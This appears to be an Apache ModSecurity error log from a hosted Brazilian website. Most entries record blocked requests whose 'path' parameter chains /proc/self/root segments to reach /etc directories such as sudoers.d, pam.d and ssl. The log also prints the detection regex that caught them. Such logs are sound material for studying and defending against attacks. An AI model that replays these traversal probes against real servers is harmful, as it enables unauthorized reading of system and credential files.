[Tue Mar 17 14:33:10.849174 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:33130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQVtY0UrI5A3LftIz9_gAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:12.156107 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:33146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQWMU6Sx0TG1YjmQixEwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:13.455853 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.241.31:33162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQWb-sgTmmJoPuMdy4WQAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:14.907609 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:33168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQWvPqhzTj3BvfDX-KBQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:17.409032 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:33184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQXQeiSKl8TjouI-YbnQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:17.674030 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.244.43:57890] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmQXXIk7brgkOH-rIWNqAAAAUE"]
[Tue Mar 17 14:33:18.177151 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.228.61:44926] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmQXr-sgTmmJoPuMdy4WgAAAtQ"]
[Tue Mar 17 14:33:23.709319 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.241.31:36652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQY64xEDsg_V3ESNZOcAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:27.853420 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:36666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQZ7-sgTmmJoPuMdy4YAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:29.189296 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:44960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQaRj0p0SRWAqcjGF7gAAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:31.113843 2026] [proxy_fcgi:error] [pid 18380:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40604] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:33:31.642387 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.31:44974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQa6BJNF7axNlVR0UZnQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:33.082178 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:44986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQbcU6Sx0TG1YjmQixFgAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:35.643417 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.241.31:45002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQbxj0p0SRWAqcjGF7hAAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:45.583112 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:45010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQedY0UrI5A3LftIz-CwAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:48.471077 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.31:40414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQe6BJNF7axNlVR0UZowAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:53.130136 2026] [proxy_fcgi:error] [pid 9299:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41082] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:34:15.130083 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41452] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:34:37.057893 2026] [proxy_fcgi:error] [pid 18380:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:34:47.621374 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:45892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQt9Y0UrI5A3LftIz-PgAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:34:50.464358 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:56624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQugeiSKl8TjouI-YbuQAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:34:53.316149 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:56628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQvcU6Sx0TG1YjmQixNAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:34:54.939827 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:56638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQvgeiSKl8TjouI-YbugAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:34:59.129784 2026] [proxy_fcgi:error] [pid 17965:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42222] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:35:01.179083 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:56644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQxcU6Sx0TG1YjmQixRQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:03.977507 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:34054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQxweiSKl8TjouI-YbvAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:08.003377 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:34056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQzPPqhzTj3BvfDX-KIwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
